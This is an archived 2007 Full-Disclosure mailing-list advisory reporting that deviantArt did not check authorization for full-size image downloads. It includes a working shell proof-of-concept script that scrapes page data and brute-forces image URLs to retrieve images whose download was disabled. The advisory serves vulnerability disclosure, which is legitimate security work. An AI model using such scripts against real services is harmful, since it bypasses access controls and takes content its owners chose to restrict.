Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] deviantArt does not check authorization for image down

from [Timothy Redaelli] Network Security [Permanent Link]
Subject: [Full-disclosure] deviantArt does not check authorization for image download
Date: Wed, 27 Jun 2007 11:41:23 +0200 
Security Advisory
-----------------
Title: Â Â Â ÂdeviantArt does not check authorization for image download
Risk Rating: ÂHigh
Platforms: Â ÂAny
Author: Â Â Â Timothy Redaelli <tredaelli@inventati.org>
Date: Â Â Â Â 27-06-2007

Overview
--------
deviantArt does not apply any type of authorization checking for full-size 
image download.

Details
-------
It is possibile to download the full-size (as uploaded) image also if the 
Download button is disabled.

Proof of Concept
----------------
#!/bin/sh
# Copyright (c) 2007 Timothy Redaelli <tredaelli@inventati.org>

URL=$1

download()
{
        wget -U "" -nv "$@"
}

parse()
{
        wget -U "" http://www.deviantart.com/download/"$URL"/ && exit 0
        URLS=$(wget -qU "" -O - http://www.deviantart.com/deviation/"$URL"/ | 
fgrep 'deviantART.pageData' | sed -e 's/^.*"fullview":
{[^}]*"\(http[^"]*\).*$/\1/' -e 's/\\//g' | awk -F / '{for (i = 0; i <= 0xF; 
i++) for (j = 0; j <= 0xF; j++) 
printf "http://69.28.181.52/%s/f/%s/%s/%x/%x/%s\n";, $4, $6, $7, i, j, $10}')
}

parse "$1"

echo "$URLS" | while read x; do
        download "$x" && exit 0
done

Timeline
--------
Mar 26, 2007 -- Bug discovery.
Mar 27, 2007 -- Contact deviantArt, no reply.
Jun 26, 2007 -- Recontact deviantArt, still no reply.
Jun 27, 2007 -- Bug published.

Credits
-------
* Timothy Redaelli <tredaelli@inventati.org>

-- 
Timothy Redaelli
http://timothyredaelli.wordpress.com/

Attachment: signature.asc
Description: This is a digitally signed message part.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] deviantArt does not check authorization for image download, Timothy Redaelli <=
Previous by Date:  Re: [Full-disclosure] Apple Safari: idn urlbar spoofing, Robert Swiecki
Next by Date:  [Full-disclosure] CheckPoint VPN-1 UTM Edge Cross Site Request Forgery vulnerability, Henri Lindberg - Louhi Networks Oy
Previous by Thread:  [Full-disclosure] [USN-477-1] krb5 vulnerabilities, Kees Cook
Next by Thread:  [Full-disclosure] CheckPoint VPN-1 UTM Edge Cross Site Request Forgery vulnerability, Henri Lindberg - Louhi Networks Oy
Indexes:  [Date] [Thread] [Top] [All Lists]